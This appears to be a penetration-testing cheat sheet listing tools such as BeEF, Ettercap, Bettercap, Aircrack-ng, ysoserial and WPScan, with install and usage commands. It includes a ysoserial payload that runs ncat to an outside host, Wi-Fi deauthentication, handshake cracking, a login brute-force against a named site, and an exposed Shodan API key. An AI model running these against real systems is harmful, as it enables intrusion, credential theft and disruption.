Reference List
    1. Lynis
    2. BeEF
    3. Autopsy
    4. King Phisher
    5. Yersinia
    6. SocialEngineeringToolkit
    7. Ettercap
    8. Bettercap
    9. AirCrack-ng
    10. LazyRecon
    11. Wapiti
    12. SpiderFoot
    13. Ysoserial
    14. NoSQLMap
    15. MobSF
    16. JADX
    17. Frida
    18. Recon-ng
    19. WPScan
    20. Naabu
    21. FFUF
    22. wFuzz
    23. DirSearch
    24. SubFinder
    25. HTTPx
    26. EyeWitness

Lynis – An auditing tool for Unix-based systems. It scans the system by performing many security control checks [Link].

sudo apt install lynis
sudo lynis audit system
sudo lynis -Q --cronjob

BeEF – It is classified as a penetration testing tool that focuses on the web browser but in fact, it is a very malicious tool that can be used to exploit web vulnerabilities. The phishing features are incredible and mimic GMail or Facebook login pages for example [Link].

sudo apt install beef-xss
sudo beef-xss

It is going to ask for the new password.

On the browser go to http://127.0.0.1:3000/ui/panel. The default user is beef.


Autopsy – A digital forensic tool used by law enforcement officials to investigate what happened on your computer, drive, and flash drives [Link].

sudo autopsy

OR

sudo autopsy &

On the browser go to http://localhost:9999/autopsy.


King Phisher – A tool for Phishing Awareness Campaign [Link].

sudo systemctl start postgresql
sudo systemctl start king-phisher
cd /usr/share/king-phisher/
sudo ./KingPhisherServer server_config.yml

If port 80 is being in use you will have to kill the process (e.g. 123456):

sudo netstat -tulpn
sudo kill 123456

Leave it running in one terminal and on another terminal:

cd /usr/share/king-phisher
./KingPhisher

Kali Linux already has it installed and it is accessible from the main menu.


Yersinia – A DHCP Starvation attacking tool. One attached can make the DHCP server inoperative and act as the DHCP server of the network, usually assigning itself as the DNS server and directing the users to malicious websites [Link].

sudo apt install yersinia
sudo yersinia -G

SocialEngineeringToolkit – SET is an open-source penetration testing framework with a big number of custom attack vectors [Link].

sudo setoolkit

Ettercap – Man-in-the-middle attack tool using ARP poisoning [Link].

  • Select the interface(s) used for the attack, and click on the button accept,
  • Scan the network for hosts, list them, and add the targets to the target groups 1 and 2,
  • On the MITM, select ARP poisoning,
  • If not started, start the sniffing,
  • Now check the ARP table on both devices and compare it to the real ones,
  • On the man-in-the-middle box, use Wireshark or TCP Dump for example to capture the packets being transmitted between both targets.

Bettercap – Alternative to Ettercap, with additional features such as WIFI [Link].

sudo apt install bettercap
sudo bettercap --iface wlan0
>> wifi.recon on
>> events.ignore wifi.ap.new
>> set net.sniff.output handshake.pcap
>> net.sniff on
>> events.ignore net.sniff.802.11
>> wifi.show
>> wifi.recon.channel.channel 11
>> wifi.show
>> wifi.deauth FF:FF:FF:FF:FF:FF
>> events.ignore wifi.client.probe

AirCrack-ng – It consists of a detector, packet sniffer, WEP/WPA/WPA2-PSK cracker, and analysis tool for 802.11 [Link].

sudo apt install aircrack-ng
sudo aircrack-ng handshake.pcap -w /usr/share/wordlists/rockyou.txt.gz

LazyRecon – It is a very straightforward scanner intended to automate some tedious tasks of reconnaissance and information gathering in an HTML report format [Link].

git clone https://github.com/nahamsec/lazyrecon.git
./lazyrecon.sh -d example.com -e excluded.example.com

Wapiti – A web application security scanner. It performs “black-box” scans (it does not study the source code) on the web application by crawling the webpages looking for scripts and forms where it can inject data in an HTML report format [Link].

wapiti -u https://example.com

SpiderFoot – It uses OSINT to gather information about a specific target of an investigation. It crawls the websites looking for IPs,
domains/sub-domain, hostnames, network subnets (CIDR), autonomous system numbers (ASN), e-mails, phone numbers, usernames, person’s name, and bitcoin address. Then, using 200+ modules it can gatter even more information about it. For example, transactions and balance of the acquired Bitcoin addresses [Link].

sudo spiderfoot -m sfp_spider,sfp_bitcoin,sfp_blockchain -s example.com -F BITCOIN_ADDRESS,BITCOIN_BALANCE -q
sudo spiderfoot -m sfp_spider,sfp_ethereum -s exemple.com -F ETHEREUM_ADDRESS -q

Ysoserial – A collection of utilities used for exploiting Java applications performing unsafe deserialization of objects and using vulnerable libraries in order to get remote code execution [Link].

java -jar ysoserial.jar CommonsCollections4 ncat 10.0.0.1 8888 > payload
cat payload | nc 10.10.10.10 123456

First Ysoserial was used to create a Java payload according to the chosen vulnerability and remote command to be executed. Then the payload was fired up on the netcat connection (where the example’s vulnerable application was listening on).


NoSQLMap – A tool designed to automate injection attacks and exploit default configuration weaknesses in NoSQL databases (such as MongoDB) and web apps using NoSQL [Link].

git clone https://github.com/codingo/NoSQLMap.git
./setup.py
./nosqlmap.py

MobSF – Mobile Security Framework is a mobile application (Android/iOS/Windows) malware analyzer. It is capable of performing static and dynamic analysis in a sandbox and generate reports [Link].

git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
./setup.sh
./run.sh 127.0.0.1:8000

Then go to the web browser and access http://localhost:8000/.

Upload the app file (APK, for example) and play with the functionalities.


JADX – It is a (CLI and GUI) tool for producing Java source code (decompiler) from Android Dex and Apk files [Link]. See also the Dex2Jar [Link] and JAD [Link].

sudo apt install jadx
jadx app.apk

Frida – A toolkit for developers, reverse-engineers, and security researchers. It is a dynamic binary instrumentation framework [Link].

pip install frida-tools

OR

docker run --security-opt seccomp:unconfined -it name_of_the_docker /bin/bash

Basic commands:

  • frida-ps
    • List all running processes names and PIDs running.
  • frida-ps -U
    • List on a USB device.
  • frida-ls-devices
    • List all attached devices.
  • frida-trace -U Twitter -i “recv*”
    • Traces native APIs.

Recon-ng – It is a web reconnaissance framework designed exclusively for web-based open source [Link].

recon-ng
> marketplace search contacts
> marketplace install recon/domains-contacts/whois_pocs
> modules load recon/domains-contacts/whois_pocs
  > info
  > options unset SOURCE
  > options set SOURCE example.com
  > run
  > back
> marketplace search domain
> marketplace install recon/domains-hosts/bing_domain_web
> modules load recon/domains-hosts/bing_domain_web
  > options set SOURCE example.com
  > run
> marketplace search google
> marketplace install recon/domains-hosts/google_site_web
> modules load recon/domains-hosts/google_site_web
  > options set SOURCE example.com
  > run
> arketplace search interesting
> marketplace install discovery/info_disclosure/interesting_files
> modules load discovery/info_disclosure/interesting_files
  > options set PORT 443
  > options set PROTOCOL https
  > run
> shell ls ~/.recon-ng/workspaces/default/
> marketplace search shodan
> marketplace install recon/domains-hosts/shodan_hostname
> keys add Y9yraMjfdgUTSy9Z5okhnDQeWadPw2dP
> modules load recon/domains-hosts/shodan_hostname
  > options set SOURCE example.com
  > run
> show hosts
> show contacts
> workspaces create new
> show hosts
> workspaces list
> workspaces load default
> db schema
> db delete hosts
> db insert hosts
> marketplace search report
> marketplace install reporting/html
> modules load reporting/html
  > options set CREATOR MyName
  > options set CUSTOMER MyClient
  > run
> exit

Web Interface

locate recon-web
/usr/share/recon-ng/recon-web

WPScan – A free WordPress security scanner [Link].

wpscan --update
wpscan --url https://example.com
wpscan --url https://example.com --enumerate p
wpscan --url https://example.com --enumerate u
wpscan --url https://example.com --enumerate t
wpscan --url https://example.com --enumerate tt
wpscan --url https://example.com --proxy 127.0.0.1:8118
wpscan --url https://example.com --wordlist word.lst --threads 50 --username admin

Naabu – A simple and fast ports for enumerating valid ports using fast SYN scan on the host/list of hosts [Link].

docker pull projectdiscovery/naabu
docker run -it projectdiscovery/naabu -host example.com -silent
docker run -it projectdiscovery/naabu -host example.com -silent -p -
docker run -it projectdiscovery/naabu -host example.com -silent -iL hosts.txt
docker run -it projectdiscovery/naabu -host example.com -silent -nmap-cli 'nmap -sV'
docker run -it projectdiscovery/naabu -host example.com -silent -o output.txt
docker run -it projectdiscovery/naabu -host example.com -silent -interface eth0
docker run -it projectdiscovery/naabu -host example.com -silent -source-ip 10.10.10.10

FFUF – Fuzzing tool for web applications [Link].

sudo apt install golang-go
go get -u github.com/ffuf/ffuf
~/go/bin/ffuf -V

OR

sudo apt install ffuf
ffuf -V

Usage:

ffuf -u https://example.com/FUZZ/ -w word.lst
ffuf -u https://example.com/?s=FUZZ -w word.lst
ffuf -u https://example.com/FUZZ -w word.lst -c
ffuf -u https://example.com/FUZZ -w word.lst -sf
ffuf -u https://example.com/FUZZ -w word.lst -recursion -e .bak
ffuf -u https://example.com/FUZZ -w word.lst -s -of html -o output.txt
ffuf -u https://W1.com/W2 -w domain.lst:W1 -w word.lst:W2
ffuf -u https://example.com/ -X POST -d "username=W1\&password=W2" -w users.lst:W1 -w passes.lst:W2
ffuf -u https://example.com/FUZZ -w word.lst -x http://proxy:port
ffuf -u https://example.com/FUZZ -w word.lst -x socks5://127.0.0.1:9150

wFuzz – Another fuzzing tool for web applications [Link].

wfuzz -c --hc 404 -w word.lst http://example.com/FUZZ
wfuzz -c -z file,users.lst -z file,passes.lst -d "log=FUZZ&pwd=FUZ2Z" http://rcsalenga.ca/wp-login.ph

DirSearch – x [Link].

git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
pip3 install -r requirements.txt
./dirsearch.py -u https://example.com
./dirsearch.py -e php,asp,cgi -w word.lst -r -R 5 -t50 -m POST --data "username=admin" -u https://example.com

SubFinder – Designed to discover valid subdomains using passive online sources [Link].

sudo apt install subfinder -y
subfinder -d example.com
subfinder -d example.com -silent 
subfinder -v -d example.com 
subfinder -dL domains.txt

HTTPx – x [Link].

git clone https://github.com/projectdiscovery/httpx.git; cd httpx/cmd/httpx; go build; sudo mv httpx /usr/local/bin/; httpx -version
echo example.com | httpx
echo example.com | httpx -silent
subfinder -d example.com -silent | httpx -silent

EyeWitness – Automates taking screenshots of websites and provide server headers [Link].

sudo apt install eyewitness
eyewitness -f list.txt